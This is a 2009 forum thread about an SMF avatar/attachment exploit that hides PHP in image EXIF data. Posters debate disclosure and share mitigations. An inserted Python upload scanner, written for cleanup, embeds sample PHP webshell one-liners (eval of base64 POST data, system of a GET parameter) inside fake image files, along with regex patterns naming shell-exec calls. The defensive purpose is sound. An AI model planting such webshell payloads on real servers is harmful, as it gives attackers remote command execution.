Hacked: 1.1.8 attachments / avatars still has a vulnerability

Started by rthrash, May 11, 2009, 11:07:12 AM


JBlaze

Quote from: dreamers4317 on May 18, 2009, 07:09:28 AM
Hi Lexa, thanks for the reply and, much as it's appreciated, I would not have a clue how to do that, and as our site owner is a bit elusive and it would be him who normally does that sort of thing, we are a bit stuck. So we just hope that the patch will fix things for us.

The patch is intended to close off the exploit as well as do much more. It will not, however, clean your forum if it has been hacked. This patch covers all three branches of SMF. (1.0.x - 1.1.x - 2.0)
Jason Clemons
Former Team Member 2009 - 2012


JBlaze

Quote from: dreamers4317 on May 18, 2009, 07:49:42 AM
Oh bugger!

If you have been hacked, feel free to start a topic and members here will be glad to assist you.

dreamers4317

Quote
But you could also just clean out the files and database manually, and while that would require a bit of work, it would also save your new posts from the time after this hack occurred.
Can any one give us a simple blow by blow way of doing this please?

Sverre

We don't use the attachments or locally stored avatars features on our SMF forum, so these last exploits haven't really been an issue for us, but I have to agree with wtmpp that the way this has been handled by SMF doesn't exactly inspire confidence...

I visit this community on a daily basis, but since I'm not looking for support at the moment, I rarely, if ever, open the SMF 1.x Support board. I actually only became aware of this situation by chance while reading the Bug Tracker. I understand the desire not to broadcast the vulnerability to the world, but if information about it can be posted publicly in this board, I don't see why it couldn't have been posted in the News and Updates board, where it would be much more prominent to visitors of the community, instead. By trying to keep such a tight lid on these situations, I feel SMF does its members/users a huge disservice.

I'm just glad that the restrictive permission scheme we're running already keeps us safe from many of these attacks, especially considering the fact that MagicOPromotion paid us a visit a couple of weeks ago.

DavidCT

I don't suppose disabling PHP execution itself in the folder would fix this, right? If it did, you could do this...

.htaccess (in avatars and attachments folders)

# Route every script-like extension to the CGI handler...
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
# ...and then forbid CGI execution in this directory, so a request for any of
# those extensions is refused instead of run (needs AllowOverride Options)
Options -ExecCGI


Trying to execute PHP scripts would give a 403 error.

LiroyvH

Quote
CoreISP/Liroy, here are the 1st  4 stickied posts. Does any of them have any specific "Call To Action?"

By the looks of it, yes it does tell you what you can do to temporarily secure your forum.

Quote
Let's get personal: you run a hosting company, correct?
http://order.dedicatedbox.net/cart.php?a=confproduct&i=0 Here is a link to the details page of one of your hosting offerings, and I see you use Plesk.

I don't use Plesk myself, I use cPanel, but yes, I do offer it.

Quote
Now let's say that you have a Linux administrator who regularly sends you an email about the security update news he comes across.
There is a major security hole in Plesk 9 that allows an attacker to take COMPLETE CONTROL OF THE SERVER. Your Linux admin sends you a notice (one of MANY) that says
"How to secure and harden Plesk against attack"...
Do you think an issue as serious and with as severe implications as this would deserve a more *assertive* warning?

I have no doubt that Plesk 9 has security holes, lol. (just kidding)
Anyway, assuming that such a big security hole would be in place:
No, because I would know they are working on a solution. (Plesk is paid by the way, SMF is free)
If they are working on a solution, and they warn me that it is best to disable 2 features on the system while they are working very hard on a patch, then I will most certainly disable those 2 features.
It's not an "assertive" warning, it is simply a big warning telling you that there is a major issue and that you should take steps immediately while the problem is being attended to by their programmers.
Leaving those 2 functions enabled when it is not patched is simply dumb and being lazy.

Quote
It may be bad to shout "fire" in a crowded theater, but is it better to whisper? What if there really IS a fire? Should we all burn?

There are tons of topics on this issue, and if a patch is released, people will know.
Pointless to light the same fire if there is no point.

Quote
Ask yourself this: If you had an employee who's job it was to monitor security news and bring matters to your attention and THAT was the casual way he did it... wouldnt you *fire his ass??*

... Why? If he is doing his job and there is nothing he can do, except for providing temp. steps to secure the system while the coders are working on it, why should I fire him? For bringing news that isn't exactly what I want to hear because I don't like security issues? Nice boss that would fire you :-X

Anyway, I think you are overreacting. There is a problem, it is being attended to, and in the meanwhile a temp. solution has been given multiple times all over the forum. If you don't follow that advice then it is your own fault if you run into issues. Nothing more that I can say about it.

/exit topic.


Sincerely,
- Liroy
((U + C + I)x(10 − S)) / 20xAx1 / (1 − sin(F / 10))
President/CEO of Simple Machines - Server Manager
Please do not PM for support - anything else is usually OK.

JBlaze

Thanks Liroy. Perfectly put.

To add on, there are members who have dedicated a lot of their time to helping members who have been attacked. I, myself, have dedicated countless hours to helping others resolve this issue and also helping secure their sites temporarily until this patch is released.

There are other ways to prevent this attack from happening as well. SMF could say "Screw it, just take your forum offline. Problem solved." But no, they didn't. Instead, they chose to take the time and get the patch done right. How the SMF Team has handled this situation as far as making it public is totally up to them, and I agree with the way they are doing it, but it remains personal preference I guess.

Just think, there are a lot of changes happening at this time. The SMF Team has its hands full with 2.0 RC2, Curve, and this attack, just as a sample. Just keep in mind that the steps provided in these many topics are intended to temporarily prevent the attacks from happening until the patch is out. Sometimes, you gotta sacrifice functionality for security.

Best regards,
JBlaze

kat

Of course, there's the other way of looking at it...

If this vulnerability was broadcast in big letters all over the net, other script-kiddies would know about it and try to exploit it.

We all have our own opinions and slamming people about it will hardly help matters.

Just my tuppence worth...

babjusi

I agree. The SMF team is very busy with SMF 2 and all, and knowing that the SMF staff take security very seriously, I am sure that they are working hard at releasing a patch that will fix the issue. However, these things must be thoroughly tested before being released and this could take some time. So the best way is to hang on for a bit more and give the team the time needed to take care of it.

busterone

I have been watching this since it first became known that there was an issue. I have especially noticed how efficient and helpful JBlaze has been in this situation. Although I was not hacked myself, I believe thanks and kudos to you JBlaze for your efforts here are in order. I also want to commend all of the staff for the handling of this problem. I agree with the way it has been handled. Every other script kiddie in the world does not visit this site, but you can bet that if a widespread announcement was made, hundreds more would jump on the bandwagon and try their hand at hacking a few sites. I believe more damage would have occurred if that were so. That said, I should also say no more on this subject myself either, other than thanks to all the hard working volunteers that do this on their own time.

Faded Glory

I too, have no dog in this fight. As soon as I saw the first topic on here about this exploit and the hacker I went and made sure to secure my forum.

I am not a coder nor do I have the ability to do the intricate work that goes into adding or removing script.

I can use common sense and make sure my door is locked to try and keep a thief out.

JBlaze has gone above and beyond the call of duty on this. I have read nearly everything he has put up about this. Every time I get on here, he is here. So kudos to him and the team for all the long hours of FREE work you all have put in here fighting this fire!

Cheers mates
Collection 2 for Spray sig!

wtmpp

@DavidCT: Your .htaccess snippet is good to use as a general practice, but would not be applicable to this particular exploit, I think, because the EXIF data is being parsed by SMF and is executed within the context of an area that HAS to be able to run PHP AND IS ALREADY RUNNING PHP when it is executing the code hiding in the JPEG.

@Those who see themselves in the following
Quote
look, SMF is a big ecosystem, like the Rainforest, there's room for everyone I think and we all play our part, from the casual users who just want to have a forum (any forum) to base their community, to those who seek to profit from and sell to the huge SMF community, those who lack a sense of personal identity and find here a "place where they can BE SOMEBODY IMPORTANT AND A REAL MAN" - (like World Of Warcraft w/o the spells and subscription fees : ), and the obsequious fan boys, to whom SMF can do no wrong and who sit poised like crows on a telephone pole to vociferously denounce as "flames" and "trolling" common sense arguments demanding an equitable and sensible approach to dealing with security issues.

Yeah, there's room for all in this big tent or jungle

Quote
There are other ways to prevent this attack from happening as well. SMF could say "Screw it, just take your forum offline. Problem solved." But no, they didn't. Instead, they choose to take the time and get the patch done right.
Why on earth would SMF or ANY company say something as ridiculous as "take your forum offline?"
For MOST communities with a forum, the forum IS the community! I guess it makes sense to proffer an even more bizarre position to offset an indefensible one?

Here is the approach that SMF should do /should have done.

1. Update the News feed that is pulled when you log in to your Admin panel warning of the issue. (1 hr or less)

2. Immediately on becoming aware of the problem, issue an alert (news on the front page) and release a version-agnostic PHP file that would do the settings patch (via the MySQL database) to disable avatars and attachments.
(15 minutes)

3. Update the SMF download so that the downloaded version DISABLES THE AT-RISK FUNCTIONALITY BY DEFAULT (1 hr)
Admins would see the security update in progress message when they log in.

4. THEN continue working on a more appropriate patch, that can secure the functionality AND allow it to be used.

I know you feel proud of yourself and your "countless hours spent" but really, it can't have been more than 4 or 5, and if this information was properly disseminated, it would have been ZERO.

I know full well that its a league of volunteers, but there is no excuse for sloppy, unprofessional attitudes backed up by a cheerleading team.

On some SMF forums I have seen, there is a message that pops up when you browse as guest
Quote
I see you are browsing as a guest! please login or register to see what we have to offer!

we could have..
Quote
NOTICE! - AN URGENT MESSAGE IS WAITING FOR SMF SITE ADMINISTRATORS- Please log in to SMF here, or to the admin panel of your forum!


@Kat - script kiddies have been running wild with this for months, and anyway, announcing that there is a vulnerability and a way to patch it (without getting into explicit details of how to reproduce it or even exactly how the vector works) is the appropriate thing to do, not bury heads in the sand and hope "script kiddies don't pass by and see us with our butt in the air :("

@babjusi
I couldn't agree with you more, of course they will work hard on the patch!

You know, SMF could do something like IE and have a range of SQL files that set the SMF security context to Low, Medium, High, Lockdown?
Basically a sliding scale of functionality vs. paranoia vs. security?
You can trade off simply what you want or are prepared to do without.
Experts, of course, will use the fine-tuned controls in the admin panel.
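dreamers4317 asked earlier in the thread for a blow-by-blow way to clean the files manually, and wtmpp's reply above points out that the payload in this case rides inside the JPEG rather than in a separately named script. The following is an added example, not code from this thread or from SMF: a Python triage scan over an avatars/attachments tree that flags files whose extension and file header disagree, files with an executable extension sitting among uploads, and image or extensionless files whose bytes contain a PHP open tag or the calls a one-line webshell is built from. SMF's own listing-blocker index.php is allowed through unless it has grown such calls. The directory names, file names and file contents are constructed for the demonstration; the patterns are a starting point for an admin doing cleanup, not SMF's checks.

```python
"""Scan a forum's avatars/attachments tree for files that are not what they claim to be."""
import os
import re
import tempfile

# Magic-number prefixes for the image formats a forum normally accepts as uploads.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
# Extensions that have no business in a directory meant for user uploads.
EXEC_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "pl", "cgi", "py", "sh"}
# Files SMF itself places in these directories (listing-blocker stub and rules file).
SHIPPED = {"index.php", ".htaccess"}

# PHP open tags, and the calls a one-line webshell is built from. Bytes patterns so
# binary image data scans without decoding errors.
PHP_TAG = re.compile(rb"<\?php|<\?=|<script[^>]*language\s*=\s*['\"]?php", re.IGNORECASE)
SHELL_CALL = re.compile(
    rb"\b(eval|assert|base64_decode|gzinflate|passthru|shell_exec|system|exec|popen)\s*\(",
    re.IGNORECASE,
)


def inspect_file(path):
    """Return the reasons this file looks wrong; an empty list means nothing odd was seen."""
    name = os.path.basename(path)
    ext = name.rsplit(".", 1)[1].lower() if "." in name[1:] else ""
    with open(path, "rb") as fh:
        data = fh.read()
    findings = []
    if name in SHIPPED:
        # The stub index.php legitimately starts with <?php; flag it only if it grew shell-like calls.
        if SHELL_CALL.search(data):
            findings.append("shipped %s contains shell-like calls" % name)
        return findings
    if ext in EXEC_EXTS:
        findings.append("executable extension .%s in an upload directory" % ext)
    if ext in IMAGE_MAGIC and not data.startswith(IMAGE_MAGIC[ext]):
        findings.append("named .%s but lacks a %s header" % (ext, ext.upper()))
    if PHP_TAG.search(data):
        findings.append("PHP open tag inside the file body")
    if SHELL_CALL.search(data):
        findings.append("shell-like PHP call inside the file body")
    return findings


def scan_directory(root):
    """Walk root and map each suspicious file (path relative to root) to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in sorted(files):
            full = os.path.join(dirpath, fname)
            findings = inspect_file(full)
            if findings:
                report[os.path.relpath(full, root).replace(os.sep, "/")] = findings
    return report


# Constructed sample tree: every name and body below is made up for this demo.
SAMPLE_FILES = {
    # valid JPEG header, then a PHP payload parked where EXIF metadata would sit
    "avatars/avatar_12.jpg": b"\xff\xd8\xff\xe1\x00\x40Exif\x00\x00<?php eval(base64_decode($_POST['c'])); ?>\xff\xd9",
    # a clean 1x1 GIF
    "avatars/avatar_7.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;",
    # named .png but is plain PHP
    "avatars/avatar_9.png": b"<?php system($_GET['cmd']); ?>",
    # SMF's listing-blocker stub, as shipped
    "attachments/index.php": b"<?php\nif (file_exists(dirname(dirname(__FILE__)) . '/index.php'))\n\tinclude (dirname(dirname(__FILE__)) . '/index.php');\nelse\n\texit;\n?>",
    # extensionless attachment blob, the normal SMF storage form
    "attachments/42_d41d8cd9": b"\x00\x01\x02binary attachment body",
    # a script someone managed to drop among the attachments
    "attachments/upload.php": b"<?php echo 'hello'; ?>",
    "attachments/.htaccess": b"Options -Indexes\n",
}


def build_sample_tree(base):
    """Write the constructed sample files under base."""
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)


def demo():
    """Build the sample tree in a temporary directory and scan it."""
    base = tempfile.mkdtemp(prefix="smf-upload-scan-")
    build_sample_tree(base)
    return scan_directory(base)


if __name__ == "__main__":
    for rel, reasons in sorted(demo().items()):
        print(rel)
        for reason in reasons:
            print("    -", reason)
```

Point scan_directory() at the real avatars and attachments directories rather than demo(). Anything it flags should be moved out of the web root for inspection, not deleted outright, and its modification time compared against the window in which the forum was hit; a clean header with a PHP tag after it is exactly the polyglot case wtmpp describes. The scan is a triage aid for the cleanup dreamers4317 asked about; it does not replace applying the patch or restoring the forum files from a known-good copy.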

LiroyvH

Quote
Why on earth would SMF or ANY company say something as ridiculous as "take your forum offline?"

The point of the story was that that is exactly what they did !!NOT!! do.

Did you keep in mind that making a global announcement will let all script kidz0rs out th3r3 know about this issue? That would make it even a bigger issue.

Quote
I see you are browsing as a guest! please login or register to see what we have to offer!

We could have...

NOTICE! - AN URGENT MESSAGE IS WAITING FOR SMF SITE ADMINISTRATORS- Please log in to SMF here, or to the admin panel of your forum!

It is not SMF that maintains the messages that pop up... It is user-defined.


Anyway, no point in arguing with you. You are, according to yourself, right and everybody else that doesn't have the same opinion isn't right and is unprofessional... Hehe.

Good luck to you and your forum :)
I do hope you did disable those functions in the meanwhile though.


Sincerely,
- Liroy

Ben_S

Quote from: wtmpp on May 18, 2009, 08:04:11 PM
we could have..

NOTICE! - AN URGENT MESSAGE IS WAITING FOR SMF SITE ADMINISTRATORS- Please log in to SMF here, or to the admin panel of your forum!

And draw widespread attention to a not very widely known security hole?
Liverpool FC Forum with 14 million+ posts.

JBlaze

Quote from: busterone on May 18, 2009, 07:26:06 PM
I have been watching this since it first became known that there was an issue. I have especially noticed how efficient and helpful JBlaze has been in this situation. Although I was not hacked myself, I beleive thanks and kudos to you JBlaze for your efforts here are in order. I also want to commend all of the staff for the handling of this problem. I agree with the way it has been handled. Every other script kiddie in the world does not visit this site, but you can bet that if a widespread announcement was made, hundreds more would jump on the bandwagon and try their hand at hacking a few sites. I believe more damage would have occurred if that were so.  That said, I should also say no more on this subject myself either, other than thanks to all the hard working volunteers that do this on their own time.
Quote from: Faded Glory on May 18, 2009, 07:46:06 PM
I too, have no dog in this fight. As soon as I saw the first topic on here about this exploit and the hacker I went and made sure to secure my forum.

I am not a coder nor do I have the ability to do the intricate work that goes into adding or removing script.

I can use common sense and make sure my door is locked to try and keep a thief out.

JBlaze has gone up and beyond the call of duty on this. I have read nearly everything he has put up about this. Everytime I get on here, he is here. So kudos to him and the team for all the long hours of FREE work you all have put on here fighting this fire!

Cheers mates 

Thanks, it's all in a days work and countless sleepless nights :)



@wtmpp: While you are allowed to have your opinion on this matter, it is obvious that you do not realize the full picture. I have been working with members as well as SMF Team Members on this issue. I have seen pretty much everything this attack can throw at me. So please, take things as they are and try not to start a huge debate/fight on a topic as serious as this.

Do not take this the wrong way, I am not flaming you. You are, as I said, entitled to your opinion. But in this case, your opinion is faulted. There are reasons why the SMF Team has done what they have done.

Now, allow me to go back to work.

Regards,
JBlaze

Antechinus

Quote from: wtmpp on May 18, 2009, 08:04:11 PM
3. Update the SMF download so that the downloaded version DISABLES THE AT-RISK FUNCTIONALITY BY DEFAULT (1 hr)

I can see the arguments in favour of not publicising the exploit more than necessary but I think this particular suggestion is worth considering.


Quote
@Kat - script kiddies have been running wild with this for months, and anyway, announcing that there is a vulnerability and a way to patch it (without getting into explicit details of how to reproduce it or even exactly how the vector works) is the appropriate thing to do, not bury heads in the sand and hope "script kiddies don't pass by and see us with our butt in the air :("

No, they haven't. This is a new exploit. It may be loosely related to earlier ones but script kiddies are not running wild with this one. It's being deployed by one specific group.


Quote
You know, SMF could do something like IE and have a range of SQL files that set the SMF security context to Low, Medium, High, Lockdown?
Basically a sliding scale of functionality vs. paranoia vs. security?
You can trade off simply what you want or are prepared to do without.
Experts, of course, will use the fine-tuned controls in the admin panel.

I think this is another suggestion that is worth considering. Of course what will happen in practice is that many inexperienced admins will want all the frills and have no understanding of risks (we see this all the time) and will use the lowest security settings anyway, but at least it would give anyone who does want security and lacks skills a good warning and some easy options.

Crasy

I must add....

Why didn't we get told to disable attachments and avatars through our admin panels? I know it would have made an unknown problem known...

But... well... even now when the problem IS widely known... why aren't we being told?
I'm sure every script kiddie knows about the exploit by now. It's time to tell the forum administrators.

However, however,
I must commend the efforts shown by staff, regulars and even random members around here. Seriously, you guys are doing a great job figuring this out. And while I cannot tell how much effort the devs are putting into a patch, I have to thank them in advance.

Broken Arrow

I have to add my 2cents here. I have had other forum software in the past and none of them offered anywhere near the support that SMF has offered. Anytime I need help, I come here and someone helps me within minutes it seems.
Once I knew images (avatars) were missing I came here and saw what was happening. I followed the directions on what to do to stop it and then went about cleaning up the mess. JBlaze especially has gone out of his way to help me and many others.

This is the first time my forum has had any incident with some outsider causing any kind of trouble. And these fine folks here at SMF have done more to help those of us who aren't sure of what we are doing than any other software support team ever has.

I applaud every member of this support team.  You deserve high praise for your work!

and if someone else out there has an idea on how the support could be better, then I suggest signing up and becoming a member of the support team.


legoracer

Quote from: Broken Arrow on May 19, 2009, 12:15:08 AM
I have to add my 2cents here. I have had other forum software in the past and none of them offered anywhere near the support that SMF has offered. Anytime I need help, I come here and someone helps me within minutes it seems.
Once I knew images (avatars) were missing I came here and saw what was happening. I followed the directions on what to do to stop it and then went about cleaning up the mess. JBlaze especially has gone out of his way to help me and many others.

This is the first time my forum has had any incident with some outsider causing any kind of trouble. And these fine folks here at SMF have done more to help those of us who aren't sure of what we are doing than any other software support team ever has.

I applaud every member of this support team.  You deserve high praise for your work!

and if someone else out there has an idea on how the support could be better, then I suggest signing up and becoming a member of the support team.

X2

The SMF guys/gals just ROCK!! phpBB wouldn't help like this... vBullcrap wouldn't help... SMF sure does!! Keep up the great work!! It is nice to have a FREE forum that has this much support!! Where do I donate?
Do you know where the term "Boot the computer" came from....? Just think about it for a min.
